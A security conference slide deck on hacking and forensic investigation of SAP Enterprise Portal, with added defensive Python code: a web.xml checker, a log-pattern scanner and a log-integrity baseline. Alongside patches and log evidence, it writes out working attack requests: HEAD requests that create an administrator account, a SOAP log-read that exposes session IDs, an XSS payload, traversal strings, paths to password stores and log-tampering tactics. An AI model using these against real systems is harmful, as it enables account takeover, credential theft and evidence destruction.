
Invest in security to secure investments

SAP Portal: Hacking and forensics


Dmitry Chastukhin Director of SAP pentest/research team
Evgeny Neyolov Security analyst, (anti)forensics research

ERPScan
Developing software for SAP security monitoring
Talks at 35+ security conferences worldwide: BlackHat (US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
First to develop software for NetWeaver J2EE assessment
The only solution to assess all areas of SAP Security
Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge on SAP research
Leading SAP AG partner in the field of discovering security vulnerabilities, by the number of found vulnerabilities
erpscan.com

ERPScan invest in security to secure investments

Dmitry Chastukhin
Yet another security researcher
Business application security expert

Agenda
SAP security
SAP forensics, WTF?!
Say hello to SAP Portal
Breaking SAP Portal
Catch me if you can
Conclusion

SAP
The most popular business application
More than 180000 customers worldwide
More than 70% of Forbes 500 run SAP
More than 40% of the ERP market in Poland

SAP security
Espionage
  Stealing financial information
  Stealing corporate secrets
  Stealing supplier and customer lists
  Stealing HR data
Fraud
  False transactions
  Modification of master data
Sabotage
  Denial of service
  Modification of financial reports
  Access to the technology network (SCADA) via trust relations

SAP security
[Chart by year, 2003-2013, and conference (BlackHat, Defcon, HITB, RSA, CONFidence, DeepSec, Hacktivity, Troopers, Source); y-axis 10-35]
Source: SAP Security in Figures 2013

How easy? SAP Security Notes
More than 2600 in total

Is it remotely exploitable?
sapscan.com
> 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SapHostControl, etc.

What about other services?
[Chart: exposed SAP services worldwide: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]

What about unpublished threats?
Companies are not interested in publishing information about their breaches
There are a lot of internal breaches thanks to unnecessarily granted authorizations (an employee buys hundreds of excavators by mistake instead of ten)
There are known stories about backdoors left by developers in custom ABAP code
How can you be sure that, if a breach occurs, you can find evidence?

SAP Forensics
If there are no known attacks, it doesn't mean anything: companies don't like to share it
Companies don't use security audit: ~10%
Even if used, nobody manages it: ~5%
Even if managed, no correlation: ~1%

Typical SAP audit options
ICM log (icm/HTTP/logging_0): 70%
Security audit log in ABAP: 10%
Table access logging (rec/client): 4%
Message Server log (ms/audit): 2%
SAP Gateway access log: 2%
* The percentage of companies is based on our security assessments and product implementations.

What do we see?
A lot of research
Real attacks
Lack of logging practice
Many vulnerabilities are hard to close, so we need to monitor them, at least

What do we need to monitor?
External attacks on SAP*
Attacks on users and SAP GUI: awareness
SAProuter: secure configuration and patch management
Exposed SAP services: disable them
SAP Portal and web: too many issues and custom configuration; can be 0-days; we need to concentrate on this area
* Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas.

Say hello to Portal
Point of web access to SAP systems
Point of web access to other corporate systems
Way for attackers to get access to SAP from the Internet

EP architecture
[Architecture diagram]

Okay, okay. SAP Portal is important, and it has many links to other modules. So what?

SAP Logging
"If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead)."
SOURCE: SAP HELP
* Not the only drawback: there are many complex attacks with POST requests.

SAP J2EE Logging
Categories of system event recording:
System: all system-related security and administrative logs
Applications: all system events related to business logic
Performance: reserved for single activity tracing
Default location of these files in the file system:
\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\

SAP J2EE Logging
The developer trace files of the Java instance:
<SID>\<instance name>\work
The developer trace files of the central services:
<SID>\<instance name>\work
<SID>\<instance name>\log
Java server logs:
<SID>\<instance name>\j2ee\cluster\server<n>\log

Full logging is not always the best option

SAP Management Console
[Screenshot]

SAP Management Console
SAP MMC: centralized system management
SAP MMC has remote commands
Commands are simple SOAP requests
They allow reading the trace and log messages
It's not bad if you only use it sometimes and delete the logs after use, but...

SAP Management Console
What can we find in logs?
Right! The file userinterface.log contains the calculated JSESSIONID
But the attacker must have credentials to read the log file...
WRONG!

SAP Management Console
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%COUNT%</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Prevention
Don't use TRACE_LEVEL = 3
Delete traces when work is finished
Limit access to dangerous methods
Install notes 927637 and 1439348
Mask security-sensitive data in the HTTP access log (see SAP Help)

Prevention
The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
By default, only for the items listed below:
Path parameter: jsessionid
Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
(see SAP Help)

SAP NetWeaver J2EE

Access Control
Two models: declarative (by WEB.XML) and programmatic (by UME)
Web Dynpro: programmatic
Portal iViews: programmatic
J2EE Web apps: declarative

Access Control
The central entity in the J2EE authorization model is the security role
Programmers define the application-specific roles in the J2EE deployment descriptors web.xml and web-j2ee-engine.xml

web.xml (Verb Tampering)
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restricted access</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <!-- only GET is constrained: any other verb reaches the servlet without the role check -->
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>

Verb Tampering
If we try to access an application using GET, we need a login:pass and the administrator role
What if we try to access the application using HEAD instead of GET?
PROFIT!
Did you know about ctc?

Verb Tampering
Need an admin account in SAP Portal? Just send two HEAD requests
Create a new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses the JAVA database.

Prevention
Install SAP notes 1503579, 1616259, 1589525, 1624450
Install other SAP notes about Verb Tampering
Scan applications with ERPScan WEB.XML checker
Disable the applications that are not necessary
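
Added example (not ERPScan's WEB.XML checker, whose internals the deck does not show): a Python check that parses a web.xml and reports every security-constraint that constrains only some HTTP verbs, which is exactly what lets HEAD bypass the GET-only constraint above. The sample web.xml is constructed from the slide; the hardened variant drops the http-method list so the role check applies to every verb.

```python
"""Static verb-tampering check for a J2EE web.xml (constructed example, not
ERPScan's WEB.XML checker). A <security-constraint> that lists <http-method>
elements protects ONLY those verbs; any other verb (HEAD, POST, PUT, ...) reaches
the servlet without the role check, which is the GET-vs-HEAD bypass shown above.
"""
import xml.etree.ElementTree as ET

# Verbs a container routes to servlets; HEAD is the one the slides use.
KNOWN_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE"}


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # {http://java.sun.com/xml/ns/j2ee}servlet -> servlet


def check_web_xml(xml_text):
    """One finding per security-constraint that constrains only some verbs.

    No <http-method> means every verb is constrained: no finding. Servlet 3.0
    <http-method-omission> (beyond the deck's case) lists exactly the unprotected verbs.
    """
    findings = []
    for sc in ET.fromstring(xml_text).iter():
        if _local(sc.tag) != "security-constraint":
            continue
        patterns, roles, covered, omitted = [], [], set(), set()
        for el in sc.iter():
            name, text = _local(el.tag), (el.text or "").strip()
            if name == "url-pattern":
                patterns.append(text)
            elif name == "role-name":
                roles.append(text)
            elif name == "http-method":
                covered.add(text.upper())
            elif name == "http-method-omission":
                omitted.add(text.upper())
        if covered:
            uncovered = KNOWN_METHODS - covered
        elif omitted:
            covered, uncovered = KNOWN_METHODS - omitted, omitted
        else:
            continue
        findings.append({"patterns": patterns, "roles": roles,
                         "covered": covered, "uncovered": uncovered})
    return findings


def report(xml_text):
    """One human-readable line per finding."""
    return ["%s (role %s): constrained %s, NOT constrained %s" % (
                ", ".join(f["patterns"]), ", ".join(f["roles"]),
                ", ".join(sorted(f["covered"])), ", ".join(sorted(f["uncovered"])))
            for f in check_web_xml(xml_text)]


# Constructed web.xml fragment modelled on the slide: only GET is constrained.
VULNERABLE_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restricted access</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""

# Hardened variant: without an <http-method> list the constraint covers every verb.
FIXED_WEB_XML = VULNERABLE_WEB_XML.replace("      <http-method>GET</http-method>\n", "")

if __name__ == "__main__":
    for line in report(VULNERABLE_WEB_XML):
        print("FINDING:", line)
    print("fixed web.xml findings:", report(FIXED_WEB_XML))
```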

Investigation
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
Log file: j2ee\cluster\<node>\log\system\httpaccess\responses.trc

web.xml (Invoker Servlet)
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restricted access</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
    <http-method>HEAD</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>

Constrained path: GET /admin/critical/CriticalAction
Invoker servlet path, outside /admin/*: GET /servlet/com.sap.admin.Critical.Action

Invoker Servlet
Want to execute an OS command on the J2EE server remotely?
Maybe upload a backdoor in a Java class?
Or sniff all traffic?
Still remember ctc?

Invoker Servlet
[Screenshot]

Prevention
Update to the latest patch: notes 1467771, 1445998
EnableInvokerServletGlobally must be false
Check all WEB.XML files with ERPScan WEBXML checker

Investigation
J2EE security audit log entries:
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#

#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#

Investigation
[Screenshot]

XSS
Many XSSs in Portal
But sometimes HttpOnly
But when we exploit XSS, we can use the features of SAP Portal: EPCF

EPCF
EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
Enterprise Portal Client Manager (EPCM)
iViews can access the EPCM object from every portal page or IFrame
Every iView contains the EPCM object
<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
</SCRIPT>
For example, EPCF is used as a transient user data buffer for iViews

Prevention
Install SAP note 1656549

Investigation
#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
Log file: j2ee\cluster\<node>\log\system\httpaccess\responses.trc

Web Dynpro JAVA
Web Dynpro unauthorized modifications
For example: somebody steals an account using XSS/CSRF/sniffing, then tries to modify the severity level of logs

Web Dynpro JAVA
[Screenshot; reference: SAP Help]

Investigation
No traces of the change in the default log files:
\cluster\server0\log\system\httpaccess\responses.log
Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
But sometimes we can find information by indirect signs:
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
The client loaded images from the server during some changes

Investigation
Most actions have icons
They have to be loaded from the server
Usually, legitimate users have them all in cache
Attackers usually don't have them, so they make requests to the server
That's how we can identify potentially malicious actions
But there should be correlation with a real user's activity
False positives are possible:
  New legitimate user
  Old user clears cache
  Other

Directory traversal
[Screenshots: vulnerability and FIX]

Directory traversal fix bypass
[Screenshot]

Prevention
Install SAP note 1630293

Investigation
Patterns to look for:
/../
!252f..!252f
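
Added example, not ERPScan's code: a Python scan over responses.trc lines for the indicators from the investigation slides above (the ctc ConfigServlet GET 401 / HEAD 200 sequence, the !252f..!252f and /../ traversal patterns, script tags in URLs, and icon fetches that betray a cold client cache). The line format and the sample lines are constructed from the excerpts in this deck.

```python
"""Offline scan of SAP J2EE httpaccess/responses.trc lines for the indicators in
this deck: ctc ConfigServlet hits, 401-on-GET followed by 200-on-HEAD, traversal
sequences, script tags in URLs, and icon fetches from a cold cache.
Constructed example, not ERPScan's code; the line format is assumed from the slides.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+?)\s*\]\s*-\s*(?P<ip>\S+)\s*:\s*(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+HTTP/\d\.\d\s+(?P<status>\d{3})\s+(?P<size>\d+)")

# (label, regex) applied to the percent-decoded URL.
URL_RULES = [
    ("ctc ConfigServlet reached (verb tampering target)", re.compile(r"/ctc/ConfigServlet", re.I)),
    ("directory traversal (raw or !252f-encoded)", re.compile(r"/\.\./|!252f\.\.!252f", re.I)),
    ("script tag in URL (reflected XSS attempt)", re.compile(r"<\s*/?script", re.I)),
    # Icons are normally cached; a client fetching them is new, cache-cleared, or an attacker.
    ("UI icon fetched, cold cache",
     re.compile(r"tc~lm~webadmin~log_config.*\.gif$|/mimes/images/\w+\.gif$", re.I)),
]


def parse_line(line):
    """Return a dict (ts, ip, method, url, status, size, url_decoded) or None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["url_decoded"] = unquote(unquote(rec["url"]))  # %253C -> %3C -> '<'
    return rec


def scan(lines):
    """Return [(ip, label, raw_line)] for every rule hit, in log order."""
    alerts = []
    history = defaultdict(list)  # (ip, path) -> earlier records of that client on that path
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for label, rx in URL_RULES:
            if rx.search(rec["url_decoded"]):
                alerts.append((rec["ip"], label, line))
        # Verb tampering signature from the slides: the same client was refused (401)
        # on GET, then got 200 with a verb other than GET/POST on the same path.
        path = rec["url_decoded"].split("?", 1)[0]
        prior = history[(rec["ip"], path)]
        if (rec["method"] not in ("GET", "POST") and rec["status"] == 200
                and any(p["method"] == "GET" and p["status"] == 401 for p in prior)):
            alerts.append((rec["ip"], "401 on GET then 200 on %s" % rec["method"], line))
        prior.append(rec)
    return alerts


# Constructed sample modelled on the deck's log excerpts, plus one benign request.
SAMPLE_LOG = """\
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
[Apr 3, 2013 1:35:10 AM ] - 192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
[Apr 5, 2013 3:10:00 AM ] - 192.168.192.30 : GET /irj/go/km/docs/!252f..!252f..!252ftest.txt HTTP/1.1 404 0
[Apr 4, 2013 2:01:00 AM ] - 10.0.0.9 : GET /irj/portal HTTP/1.1 200 5120
""".splitlines()

if __name__ == "__main__":
    for ip, label, line in scan(SAMPLE_LOG):
        print("%-15s %-48s %s" % (ip, label, line[:60]))
```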

Breaking SAP Portal
Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
Found a file in the OS of SAP Portal with the keys to decrypt the passwords
Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
Decrypt the passwords and log into Portal
PROFIT!

Read the file
How can we read the file?
Directory Traversal
OS Command execution
XML External Entity (XXE)

XXE in Portal: Details
Injection of malicious requests into XML packets
Can lead to unauthorized file read, DoS, SSRF
There is an XXE vulnerability in SAP Portal
Can be exploited by modification of a POST request
It is possible to read any file from the OS and much more

XXE in Portal
[Screenshots of the request and response]

XXE
Error-based XXE
[Screenshot]

XXE in Portal: Result
We can read any file
Including the config with passwords
The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties

Where are the passwords?
(config.properties)
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1

SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
But where is the key?

config.properties (same file as above; the key location is the secstorefs.keyfile entry)
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key

Get the password
We have an encrypted password
We have a key to decrypt it
We got the J2EE admin and JDBC login:password!

Prevention
Install SAP note 1619539
Restrict read access to the files SecStore.properties and SecStore.key

Investigation
POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1

Investigation
The only way to get HTTP POST request values is to enable HTTP Trace:
Visual Administrator > Dispatcher > HTTP Provider > Properties: HttpTrace = enable
For 6.4 and 7.0 SP12 and lower:
On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
On Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
For 7.0 SP13 and higher:
/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
Manually analyze all requests for XXE attacks

Malicious file upload: Attack
Knowledge Management allows uploading to the server different types of files that can store malicious content
Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
For example, it can be an HTML file with JavaScript that steals cookies

Malicious file upload: Attack
[Screenshots]

Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
* Again, images can help us.

Malicious file upload: Prevention
Enable File Extension and Size Filter:
System Administration > System Configuration > Content Management > Repository Filters > Show Advanced Options > File Extension and Size Filter
Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter

Malicious file upload: Prevention
Enable Malicious Script Filter:
System Administration > System Configuration > Content Management > Repository Filters > Show Advanced Options > Malicious Script Filter
The filter also detects executable scripts in files that are being modified and encodes them when they are saved
Enable Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied
Enable the Send E-Mail to Administrator option

Portal post-exploitation
Lots of links to other systems in the corporate LAN
Using SSRF, attackers can get access to these systems
What is SSRF?

SSRF History: Basics
We send Packet A to Service A
Service A initiates Packet B to Service B
Services can be on the same or different hosts
We can manipulate some fields of Packet B within Packet A
Various SSRF attacks depend on how many fields we can control in Packet B
[Diagram: Packet A, Packet B]

Partial Remote SSRF: HTTP attacks on other services
[Diagram: HTTP Server in the corporate network; Direct attack: GET /vuln.jsp; SSRF Attack]

Gopher URI scheme
Using the gopher:// URI scheme, it is possible to send TCP packets:
Exploit OS vulnerabilities
Exploit old SAP application vulnerabilities
Bypass SAP security restrictions
Exploit vulnerabilities in local services
More info in our BH2012 presentation: SSRF vs. Business Critical Applications

Portal post-exploitation
[Screenshot]

Anti-forensics

Anti-forensics
Flooding
Deleting
Changing

Anti-forensics
Log fl
ooding
5 active logs
Maximum log file size is 10 MB
Archiving when all logs reach the maximum size
If file.0.log reaches the max size, then open file.1.log
If file.4.log reaches the max size, then zip all and back up
The same files are rewritten after archiving

Anti-forensics
Log deleting
SAP locks write access only to the single active log
SAP allows reading/writing the other logs, so it is possible to delete them
That could reveal the attacker's presence
Log changing
SAP locks write access only to the single active log
It is possible to write into any other log file
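
Added example (not SAP's or ERPScan's code) of protecting the rotated logs described in the anti-forensics slides above: since only the active log is write-locked, a size-and-hash baseline kept off the SAP host, re-checked against the five responses.N.trc files, tells legitimate append-only growth apart from rewritten, truncated or deleted files. File names, the directory and the five-file scheme are taken from the slides; the demo data is constructed.

```python
"""Off-host integrity baseline for the rotated SAP J2EE logs (responses.0.trc ... .4.trc).

Constructed example, not SAP's or ERPScan's code. The deck notes that the engine
write-locks only the active log, so the other rotated files can be edited or
deleted unnoticed. Hashing them into a baseline kept elsewhere and re-checking
detects that: legitimate growth of the active log is append-only, so its earlier
bytes still match; rewritten, truncated or missing files do not.
The file names and the 5-file scheme are taken from the slides.
"""
import hashlib
import os
import tempfile

LOG_NAMES = ["responses.%d.trc" % i for i in range(5)]  # 5 active logs, as on the slide


def sha256_prefix(path, nbytes=None):
    """SHA-256 of the first nbytes of a file (whole file when nbytes is None)."""
    with open(path, "rb") as f:
        return hashlib.sha256(f.read() if nbytes is None else f.read(nbytes)).hexdigest()


def baseline(logdir, names=LOG_NAMES):
    """Size and hash of each existing log; store the result off the SAP host."""
    base = {}
    for name in names:
        path = os.path.join(logdir, name)
        if os.path.exists(path):
            base[name] = {"size": os.path.getsize(path), "sha256": sha256_prefix(path)}
    return base


def verify(logdir, base, names=LOG_NAMES):
    """Compare the directory with a baseline.

    Returns {name: 'ok' | 'appended' | 'TAMPERED' | 'DELETED' | 'NEW'}.
    Re-baseline right after the engine archives and rewrites all five files.
    """
    result = {}
    for name, rec in base.items():
        path = os.path.join(logdir, name)
        if not os.path.exists(path):
            result[name] = "DELETED"
        elif os.path.getsize(path) < rec["size"]:
            result[name] = "TAMPERED"  # truncated
        elif sha256_prefix(path, rec["size"]) != rec["sha256"]:
            result[name] = "TAMPERED"  # bytes that were already logged have changed
        else:
            result[name] = "ok" if os.path.getsize(path) == rec["size"] else "appended"
    for name in names:
        if name not in base and os.path.exists(os.path.join(logdir, name)):
            result[name] = "NEW"  # rotation opened a new file since the baseline
    return result


def demo():
    """Baseline four logs in a temp dir, then simulate growth, an edit and a deletion."""
    d = tempfile.mkdtemp()
    entry = "[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /irj/portal HTTP/1.1 200 10\n"
    for i in range(4):
        with open(os.path.join(d, LOG_NAMES[i]), "w") as f:
            f.write(entry * (i + 1))
    base = baseline(d)
    with open(os.path.join(d, LOG_NAMES[3]), "a") as f:   # active log grows legitimately
        f.write(entry)
    with open(os.path.join(d, LOG_NAMES[1]), "w") as f:   # rotated log rewritten, same size
        f.write((entry * 2).replace("192.168.192.14", "192.168.192.99"))
    os.remove(os.path.join(d, LOG_NAMES[2]))                 # rotated log deleted
    return verify(d, base)


if __name__ == "__main__":
    for name, state in sorted(demo().items()):
        print(name, state)
```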

Securing SAP Portal
Patching
Secure configuration
Enabling HTTP Trace with masking
Malicious script filter
Log archiving
Additional place for log storage
Monitoring of security events
  Own scripts parsing common patterns
  ERPScan has all existing web vulns/0-day patterns

Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
SAP Guides
Regular security assessments
Monitoring technical security
ABAP code review
Segregation of Duties
Security events monitoring
It's all in your hands

Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
July 31: BlackHat (Las Vegas, USA)

Web: www.erpscan.com
e-mail: info@erpscan.com
Twitter: @erpscan, @_chipik, @neyolov